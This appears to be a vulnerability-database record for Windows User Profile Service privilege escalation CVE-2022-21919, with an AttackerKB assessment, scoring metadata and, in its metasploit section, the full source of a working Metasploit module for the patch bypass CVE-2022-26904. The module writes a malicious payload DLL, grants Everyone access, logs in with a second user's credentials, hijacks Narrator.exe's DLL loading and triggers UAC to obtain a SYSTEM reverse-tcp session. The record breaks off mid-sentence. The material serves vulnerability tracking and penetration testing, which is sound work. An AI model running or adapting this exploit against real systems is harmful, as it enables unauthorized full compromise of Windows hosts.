Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.
**Recent assessments:**
**gwillcox-r7** at January 12, 2022 12:07am UTC reported:
Update: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)
According to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I’ll summarize them here for brevity.
The original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.
However upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.
Specifically by abusing the User Profile Service’s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.
Unfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\Users\TEMP`), is not a symbolic link, but didn’t check to see if any of the folders under `C:\Users\TEMP` contains a symbolic link.
Note that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.
I’d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. I’m still looking into exactly what was patched here though.
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 3
{"id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2022-21919", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "published": "2022-02-08T00:00:00", "modified": "2022-02-08T00:00:00", "epss": [{"cve": "CVE-2021-34484", "epss": 0.00262, "percentile": 0.62463, "modified": "2023-05-23"}, {"cve": "CVE-2022-21895", "epss": 0.00046, "percentile": 0.1404, "modified": "2023-05-27"}, {"cve": "CVE-2022-21919", "epss": 0.23151, "percentile": 0.95823, "modified": "2023-05-27"}, {"cve": "CVE-2022-26904", "epss": 0.00435, "percentile": 0.70943, "modified": "2023-05-27"}], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21919", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919"], "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "immutableFields": [], "lastseen": "2023-05-27T14:35:19", "viewCount": 107, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C"]}, {"type": "avleonov", "idList": ["AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0003"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-34484", "CISA-KEV-CVE-2022-21919", "CISA-KEV-CVE-2022-26904"]}, {"type": "cve", "idList": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"]}, {"type": "hivepro", "idList": ["HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "HIVEPRO:C224B728F67C8D1703A8BF2411600695", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F62D9BF485959B812585A48122216FD7", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "kaspersky", "idList": ["KLA12250", "KLA12259", "KLA12422", "KLA12423", "KLA12502", "KLA12509"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:DACEDE0F6B5888B6C6E281338C4B9980", "MALWAREBYTES:EF0C1E45728B8347B58DBE1D76A5F156"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34484", "MS:CVE-2022-21895", "MS:CVE-2022-21919", "MS:CVE-2022-26904"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005033.NASL", "SMB_NT_MS21_AUG_5005040.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS22_APR_5012591.NASL", "SMB_NT_MS22_APR_5012592.NASL", "SMB_NT_MS22_APR_5012596.NASL", "SMB_NT_MS22_APR_5012599.NASL", "SMB_NT_MS22_APR_5012604.NASL", "SMB_NT_MS22_APR_5012632.NASL", "SMB_NT_MS22_APR_5012639.NASL", "SMB_NT_MS22_APR_5012647.NASL", "SMB_NT_MS22_APR_5012649.NASL", "SMB_NT_MS22_APR_5012653.NASL", "SMB_NT_MS22_APR_5012666.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009546.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL", "SMB_NT_MS22_JAN_5009585.NASL", "SMB_NT_MS22_JAN_5009595.NASL", "SMB_NT_MS22_JAN_5009601.NASL", "SMB_NT_MS22_JAN_5009619.NASL", "SMB_NT_MS22_JAN_5009621.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:C3DA3EB171A3FE51549E5B118BC0C7BB"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD", "RAPID7BLOG:FF690F32AA83905D50C2FF923E9DD339"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894"]}, {"type": "thn", "idList": ["THN:00A15BC93C4697B74FA1D56130C0C35E", "THN:2A188AB3A1960F89715831B15A68311E", "THN:BABD510622DAA320F3F1F55EEDD7549A"]}, {"type": "threatpost", "idList": ["THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "THREATPOST:53A062956C31459E2846CD4C959DFD49", "THREATPOST:84909E392F4171398A52202CCC4E215A", "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "THREATPOST:C4B358E42FF02B710BE90F363212C84F"]}, {"type": "zdi", "idList": ["ZDI-21-966", "ZDI-22-050"]}, {"type": "zdt", "idList": ["1337DAY-ID-37625"]}]}, "epss": [{"cve": "CVE-2021-34484", "epss": 0.00131, "percentile": 0.46555, "modified": "2023-05-01"}, {"cve": "CVE-2022-21895", "epss": 0.00046, "percentile": 0.14012, "modified": "2023-05-02"}, {"cve": "CVE-2022-21919", "epss": 0.01236, "percentile": 0.83401, "modified": "2023-05-02"}, {"cve": "CVE-2022-26904", "epss": 0.00131, "percentile": 0.46639, "modified": "2023-05-02"}], "vulnersScore": 0.7}, "_state": {"score": 1685200094, "dependencies": 1685218336, "epss": 0}, "_internal": {"score_hash": "03dbb26ef26fcc820700b781910f5dbc"}, "attackerkb": {"attackerValue": 4, "exploitability": 3}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-03-30T14:43:00"}, {"category": "Other:", "source_url": "https://twitter.com/BillDemirkapi/status/1508527487655067660/photo/1", "published": "2022-03-30T14:43:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21919"], "Miscellaneous": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21919"]}, "tags": ["common_enterprise", "high_privilege_access", "default_configuration", "post_auth"], "mitre_vector": {}, "last_activity": "2022-03-30T14:43:00"}
{"metasploit": [{"lastseen": "2023-05-27T15:11:57", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-07T15:48:08", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:34:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By 